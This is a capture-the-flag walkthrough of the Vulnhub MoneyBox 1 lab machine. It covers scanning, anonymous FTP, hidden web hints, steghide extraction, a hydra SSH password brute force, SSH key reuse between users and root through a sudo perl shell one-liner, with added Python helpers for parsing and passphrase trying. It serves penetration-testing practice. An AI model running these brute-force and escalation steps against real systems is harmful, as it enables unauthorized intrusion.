Vulnhub MoneyBox 1 target machine: detailed test walkthrough

MoneyBox

Author: jason_huawen

Basic information about the target

Name: MoneyBox: 1

Address:

https://www.vulnhub.com/entry/moneybox-1,653/

Identifying the target host IP address

┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.84.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:27:23:f6      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.228  08:00:27:31:4a:3d      1      60  PCS Systemtechnik GmbH      

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.228. The other two entries, 192.168.56.1 and 192.168.56.100, are the VirtualBox host-only network's own addresses (host adapter and DHCP server), so the third host is the one to scan.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 06:38 EST
Nmap scan report for localhost (192.168.56.228)
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:31:4A:3D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds

The NMAP scan shows three open ports on the target: 21 (FTP), 22 (SSH) and 80 (HTTP). Two details matter for what follows: the ftp-anon script reports that anonymous login is allowed and that the FTP root holds a single file, trytofind.jpg, and the web server is Apache 2.4.38 with a page titled MoneyBox.
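Reading the report by eye works for three ports; on a larger scan it helps to parse it. The following is an added example (this editor's code, not part of the original post or of nmap) that turns the -oN port table above into records, attaches each NSE script's output to its port, and flags the quick wins a tester acts on first, here the anonymous FTP listing and the web server. The sample input is copied from the scan above with the ftp-syst block trimmed; the triage rules are an assumption about what is worth checking first, not an nmap feature.

```python
"""Turn nmap -oN output into structured records and triage the quick wins.

Added example, not part of the original walkthrough: NMAP_ON is the port
table copied from the scan above (ftp-syst block trimmed); the parser and the
triage rules are this editor's own and are not an nmap feature.
"""
import re

# Constructed sample: the port section of the nmap -oN report on this page.
NMAP_ON = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# An NSE script block starts with "| name:" or "|_name:"; its continuation
# lines are indented ("|   ...") or start with "|_" followed by data, not a name.
SCRIPT_RE = re.compile(r"^\|(?: |_)([A-Za-z][\w-]*):\s?(.*)$")


def parse_nmap_on(text):
    """Return one dict per port line, with NSE output attached to that port."""
    ports, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "scripts": {}}
            ports.append(current)
            continue
        if current is None or not line.startswith("|"):
            continue  # host-level lines (MAC address, Service Info, ...)
        m = SCRIPT_RE.match(line)
        if m and m.group(1) not in current["scripts"]:
            current["scripts"][m.group(1)] = [m.group(2).strip()]
        elif current["scripts"]:
            last = list(current["scripts"])[-1]
            current["scripts"][last].append(line.lstrip("|_ ").rstrip())
    return ports


def quick_wins(ports):
    """Findings to act on first: anonymous FTP (with the files it exposes) and any web server."""
    wins = []
    for p in ports:
        if p["state"] != "open":
            continue
        anon = p["scripts"].get("ftp-anon", [])
        if anon and anon[0].startswith("Anonymous FTP login allowed"):
            # continuation lines of ftp-anon are "ls -l" style entries; files start with "-"
            files = [ln.split()[-1] for ln in anon[1:] if ln.startswith("-")]
            wins.append((p["port"], "anonymous FTP", files))
        if p["service"] == "http":
            wins.append((p["port"], "http: enumerate directories", [p["version"]]))
    return wins


if __name__ == "__main__":
    for port, what, detail in quick_wins(parse_nmap_on(NMAP_ON)):
        print(f"{port}/tcp  {what}  {detail}")
```

Run against a full report the parser also copes with the multi-line ftp-syst block, because a continuation line such as "|      TYPE: ASCII" is indented and therefore never mistaken for a new script header.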

Get Access

┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ ftp 192.168.56.228
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||25579|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Feb 26  2021 .
drwxr-xr-x    2 0        0            4096 Feb 26  2021 ..
-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
229 Entering Extended Passive Mode (|||50090|)
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
100% |********************************************************************************|  1068 KiB   73.91 MiB/s    00:00 ETA
226 Transfer complete.
1093656 bytes received in 00:00 (72.10 MiB/s)
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ ls
trytofind.jpg
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ exiftool trytofind.jpg                                     
ExifTool Version Number         : 12.44
File Name                       : trytofind.jpg
Directory                       : .
File Size                       : 1094 kB
File Modification Date/Time     : 2021:02:26 03:48:17-05:00
File Access Date/Time           : 2022:11:27 06:39:49-05:00
File Inode Change Date/Time     : 2022:11:27 06:39:49-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 3984
Image Height                    : 2988
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 3984x2988
Megapixels                      : 11.9
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ steghide extract -sf trytofind.jpg 
Enter passphrase: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ stegseek trytofind.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.22% (132.4 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ 

Nothing useful so far: exiftool shows no metadata beyond the JPEG basics, steghide asks for a passphrase we do not have, and stegseek, which brute-forces steghide passphrases with rockyou.txt by default, runs through the whole list without a hit. So if the image carries hidden data at all, the passphrase has to come from somewhere else on the box.

┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ curl http://192.168.56.228
<html>
<head><title>MoneyBox</title></head>
<body>
    <h1><big>Hai Everyone......!</big></h1>
    <h2>Welcome To MoneyBox CTF</h2>
    <p><pre>
  __  __                        ____            
 |  \/  |                      |  _ \           
 | \  / | ___  _ __   ___ _   _| |_) | _____  __
 | |\/| |/ _ \| '_ \ / _ \ | | |  _ < / _ \ \/ /
 | |  | | (_) | | | |  __/ |_| | |_) | (_) >  < 
 |_|  |_|\___/|_| |_|\___|\__, |____/ \___/_/\_\
                           __/ |                
                          |___/                 </p><br>
    <p><b>it's a very simple Box.so don't overthink</b></p>
</body>
</html>

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ gobuster dir -u http://192.168.56.228 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.228
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/27 06:42:54 Starting gobuster in directory enumeration mode
===============================================================
/blogs                (Status: 301) [Size: 316] [--> http://192.168.56.228/blogs/]
/server-status        (Status: 403) [Size: 279]
Progress: 217210 / 220561 (98.48%)
===============================================================
2022/11/27 06:43:17 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ curl http://192.168.56.228/blogs/
<html>
<head><title>MoneyBox</title></head>
<body>
    <h1>I'm T0m-H4ck3r</h1><br>
        <p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
        <p>If You Want Hint For Next Step......?<p>
</body>
</html>


<!--the hint is the another secret directory is S3cr3t-T3xt-->


The HTML comment says there is another directory, S3cr3t-T3xt.

┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ curl http://192.168.56.228/S3cr3t-T3xt/
<html>
<head><title>MoneyBox</title></head>
<body>
    <h1>There is Nothing In this Page.........</h1>
</body>
</html>



<!..Secret Key 3xtr4ctd4t4 >


The comment says the secret key is 3xtr4ctd4t4. It is malformed ("<!.." and " >" instead of "<!--" and "-->"), which is why it only turns up when the raw response is read with curl; anything grepping for "<!--" would miss it. The image could not be cracked earlier with a wordlist, so this string is the obvious candidate for the steghide passphrase, and giving it to steghide at the passphrase prompt extracts data.txt.
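Harvesting such hints by hand, as the two curl calls above do, does not scale. The following is an added example (this editor's code, not from the original post) that pulls every "<!" ... ">" construct out of page bodies, including the malformed "<!.." comment on the S3cr3t-T3xt page that a strict "<!--" pattern would drop, keeps the tokens that mix letters and digits as passphrase candidates, and hands them to steghide non-interactively through its -p option. The two page bodies are copied from the responses above; steghide is a real tool with real -sf, -p and -f options, but it is only invoked if it is installed.

```python
"""Harvest hints from HTML comments and feed them to steghide.

Added example, not from the original walkthrough. The two HTML bodies below
are copied from the curl output on this page; the comment regex, the token
filter and the steghide wrapper are this editor's own. steghide's -sf/-p/-f
options are real; whether it is installed is checked at run time.
"""
import re
import shutil
import subprocess

# Constructed sample: the two page bodies fetched above, comments included.
PAGES = {
    "/blogs/": """<html>
<head><title>MoneyBox</title></head>
<body>
    <h1>I'm T0m-H4ck3r</h1><br>
</body>
</html>


<!--the hint is the another secret directory is S3cr3t-T3xt-->
""",
    "/S3cr3t-T3xt/": """<html>
<head><title>MoneyBox</title></head>
<body>
    <h1>There is Nothing In this Page.........</h1>
</body>
</html>



<!..Secret Key 3xtr4ctd4t4 >
""",
}

# Match "<!" ... ">" rather than the strict "<!--" ... "-->": the second page
# uses a malformed comment ("<!.." ... " >") that a strict pattern would drop.
COMMENT_RE = re.compile(r"<!(?:--)?(.*?)(?:--)?>", re.DOTALL)
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]+")


def html_comments(body):
    """Return the text of every <!...> construct in body except the DOCTYPE."""
    out = []
    for m in COMMENT_RE.finditer(body):
        text = m.group(1).strip(" .-\n\t")  # drop the ".." / "--" padding
        if text and not text.upper().startswith("DOCTYPE"):
            out.append(text)
    return out


def candidate_secrets(comments):
    """Tokens that mix letters and digits (leetspeak like 3xtr4ctd4t4) are the likely passphrases."""
    seen = []
    for c in comments:
        for tok in TOKEN_RE.findall(c):
            has_digit = any(ch.isdigit() for ch in tok)
            has_alpha = any(ch.isalpha() for ch in tok)
            if has_digit and has_alpha and tok not in seen:
                seen.append(tok)
    return seen


def try_steghide(stegofile, passphrases):
    """Run steghide non-interactively for each candidate; return the one that works, or None."""
    if shutil.which("steghide") is None:
        raise RuntimeError("steghide is not installed")
    for pw in passphrases:
        # -p gives the passphrase on the command line, -f overwrites an earlier extraction
        r = subprocess.run(["steghide", "extract", "-sf", stegofile, "-p", pw, "-f"],
                           capture_output=True, text=True)
        if r.returncode == 0:
            return pw
    return None


if __name__ == "__main__":
    comments = [c for body in PAGES.values() for c in html_comments(body)]
    print("comments:  ", comments)
    print("candidates:", candidate_secrets(comments))
    # next to trytofind.jpg, with steghide installed:
    # print("passphrase:", try_steghide("trytofind.jpg", candidate_secrets(comments)))
```

The original walkthrough below enters the same passphrase at steghide's interactive prompt; the wrapper above does the same thing for every candidate in one go.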

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ steghide extract -sf trytofind.jpg 
Enter passphrase: 
wrote extracted data to "data.txt".
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ ls
data.txt  trytofind.jpg
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ cat data.txt                                                              
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......


From this we learn two things:

  1. the username is renu

  2. the password is weak, so it can be brute-forced

So crack it with hydra:

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.228
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-27 06:59:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.228:22/
[22][ssh] host: 192.168.56.228   login: renu   password: 987654321

Hydra finds the password almost immediately: 987654321 sits near the top of rockyou.txt. Heed the warning about parallelism on real targets: sshd caps the number of unauthenticated connections (MaxStartups) and drops attempts beyond it, so -t 4 avoids silently missed guesses; against this VM 16 tasks happened to work.

┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ ssh renu@192.168.56.228           
renu@192.168.56.228's password: 
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ id
uid=1001(renu) gid=1001(renu) groups=1001(renu)
renu@MoneyBox:~$ sudo -l
[sudo] password for renu: 
Sorry, user renu may not run sudo on MoneyBox.
renu@MoneyBox:~$ ls -alh
total 40K
drwxr-xr-x 5 renu renu 4.0K Feb 26  2021 .
drwxr-xr-x 4 root root 4.0K Feb 26  2021 ..
-rw------- 1 renu renu  642 Feb 26  2021 .bash_history
-rw-r--r-- 1 renu renu  220 Apr 17  2019 .bash_logout
-rw-r--r-- 1 renu renu 3.5K Apr 17  2019 .bashrc
drwxr-xr-x 3 root root 4.0K Feb 26  2021 ftp
drwxr-xr-x 3 renu renu 4.0K Feb 26  2021 .local
-rw-r--r-- 1 renu renu  807 Apr 17  2019 .profile
drwx------ 2 renu renu 4.0K Feb 26  2021 .ssh
-rw-r--r-- 1 renu renu   64 Feb 26  2021 user1.txt
renu@MoneyBox:~$ cat user1.txt
Yes...!
You Got it User1 Flag

 ==> us3r1{F14g:0ku74tbd3777y4}

lily's home directory is world-readable (drwxr-xr-x, and user2.txt is mode 644), so the second flag can be read from renu's shell without first becoming lily:
renu@MoneyBox:/home/lily$ ls -alh
total 36K
drwxr-xr-x 4 lily lily 4.0K Feb 26  2021 .
drwxr-xr-x 4 root root 4.0K Feb 26  2021 ..
-rw------- 1 lily lily  985 Feb 26  2021 .bash_history
-rw-r--r-- 1 lily lily  220 Feb 25  2021 .bash_logout
-rw-r--r-- 1 lily lily 3.5K Feb 25  2021 .bashrc
drwxr-xr-x 3 lily lily 4.0K Feb 25  2021 .local
-rw-r--r-- 1 lily lily  807 Feb 25  2021 .profile
drwxr-xr-x 2 lily lily 4.0K Feb 26  2021 .ssh
-rw-r--r-- 1 lily lily   65 Feb 26  2021 user2.txt
renu@MoneyBox:/home/lily$ cat user2.txt
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}

Privilege escalation

Upload linpeas.sh to /tmp on the target, make it executable and run it. The relevant part of its output:

-rw-r--r-- 1 renu renu 393 Feb 26  2021 /home/renu/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian

-rw-r--r-- 1 renu renu 222 Feb 26  2021 /home/renu/.ssh/known_hosts
|1|mgTwrdXSHFVHz1wLX0Ywab7Hw5U=|+bawRPsGTRpz9bdC3vRE478S4Sw= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8xP+l2BvuK5pg2bEpcDV1GAoAI3kIpMznpUyfOJS29SF9N2XyYV1eEcvf0O8exXyxCs+RjVbk+8cxBs8K36CU=


-rw-r--r-- 1 lily lily 393 Feb 26  2021 /home/lily/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian

ChallengeResponseAuthentication no
UsePAM yes


This shows that the key in /home/lily/.ssh/authorized_keys is renu's own public key: the blob and the renu@debian comment match /home/renu/.ssh/id_rsa.pub exactly. So renu can SSH to lily without a password, provided the matching private key is present in renu's ~/.ssh; linpeas only printed the public half, and the successful login below confirms the private key is there. The 755 mode on lily's .ssh and the 644 authorized_keys are fine for sshd's StrictModes, which only rejects group- or world-writable files, so the flaw is the key reuse, not the permissions.
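The comparison linpeas left to the eye, matching a public key in one user's .ssh against every other user's authorized_keys, as an added example (this editor's code, not the page's or linpeas'). The key string is the one printed above; the fingerprint scheme is the one ssh-keygen -lf uses (SHA256 over the decoded key blob, base64 without padding), so the result can be checked against ssh-keygen directly, and the parser verifies that the type embedded in the blob agrees with the declared type, which catches a pasted or truncated key. A .pub file does not prove the private half exists, so every reported hop is a candidate until an actual login confirms it.

```python
"""Detect SSH key reuse between users (the renu -> lily hop on this box).

Added example, not from the original walkthrough. RENU_KEY is the public key
linpeas printed above for both /home/renu/.ssh/id_rsa.pub and
/home/lily/.ssh/authorized_keys; the parser, the fingerprint (ssh-keygen -lf
scheme: SHA256 over the decoded key blob, base64 without padding) and the
reuse report are this editor's own. Whether the private half exists cannot be
told from a .pub file, so a reported hop is a candidate until a login works.
"""
import base64
import hashlib
import struct

RENU_KEY = ("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian")

# Constructed sample: the two files that matter on this box, keyed by path.
FILES = {
    "/home/renu/.ssh/id_rsa.pub": RENU_KEY + "\n",
    "/home/lily/.ssh/authorized_keys": RENU_KEY + "\n",
}


def parse_key_line(line):
    """Return (keytype, blob, comment) for an OpenSSH public-key line, else None.

    Lines with a leading options field (command="...", from="...") are skipped;
    a blob whose embedded type disagrees with the declared type is rejected.
    """
    parts = line.strip().split(None, 2)
    if len(parts) < 2 or not parts[0].startswith(("ssh-", "ecdsa-", "sk-")):
        return None
    blob = base64.b64decode(parts[1])
    (n,) = struct.unpack(">I", blob[:4])  # blob = uint32 length || keytype || ...
    if blob[4:4 + n] != parts[0].encode():
        raise ValueError("key blob type does not match declared type")
    return parts[0], blob, parts[2] if len(parts) == 3 else ""


def fingerprint(blob):
    """SHA256 fingerprint in the format ssh-keygen -lf prints."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def key_reuse(files):
    """{user: [users whose authorized_keys accept one of that user's own keys]}."""
    owned, accepted = {}, {}
    for path, content in files.items():
        user = path.split("/")[2]  # /home/<user>/...
        for line in content.splitlines():
            parsed = parse_key_line(line)
            if parsed is None:
                continue
            fp = fingerprint(parsed[1])
            if path.endswith("/authorized_keys"):
                accepted.setdefault(fp, set()).add(user)
            elif path.endswith(".pub"):
                owned.setdefault(user, set()).add(fp)
    hops = {}
    for user, fps in owned.items():
        for fp in fps:
            targets = accepted.get(fp, set()) - {user}  # a user's own key in their own file is normal
            if targets:
                hops.setdefault(user, set()).update(targets)
    return {u: sorted(t) for u, t in hops.items()}


if __name__ == "__main__":
    for user, targets in key_reuse(FILES).items():
        print(f"{user} can ssh as: {', '.join(targets)}")
```

On a real host, feed it every readable ~/.ssh/*.pub and authorized_keys (and /etc/ssh/sshd_config's AuthorizedKeysFile if it has been moved); the same fingerprint turning up under two accounts is the finding, regardless of whose comment the key carries.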

renu@MoneyBox:/home/lily$ ssh lily@192.168.56.228
The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.228' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80

lily@MoneyBox:~$  sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
lily@MoneyBox:~$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# cd /root
# ls -alh
total 28K
drwx------  3 root root 4.0K Feb 26  2021 .
drwxr-xr-x 18 root root 4.0K Feb 25  2021 ..
-rw-------  1 root root 2.1K Feb 26  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Feb 25  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  228 Feb 26  2021 .root.txt
# cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
    It's My First CTF Box
         
instagram : ____kirthik____

See You Back....
       
# 

Root obtained. The sudoers entry "(ALL : ALL) NOPASSWD: /usr/bin/perl" is equivalent to unrestricted root: perl, like any interpreter, can exec a shell (the -e 'exec "/bin/sh";' one-liner above), and sudo has no way to constrain what the interpreter does once it is running. The fix is to drop interpreters from sudoers entirely rather than try to restrict their arguments.

posted @ 2022-11-27 20:24  Jason_huawen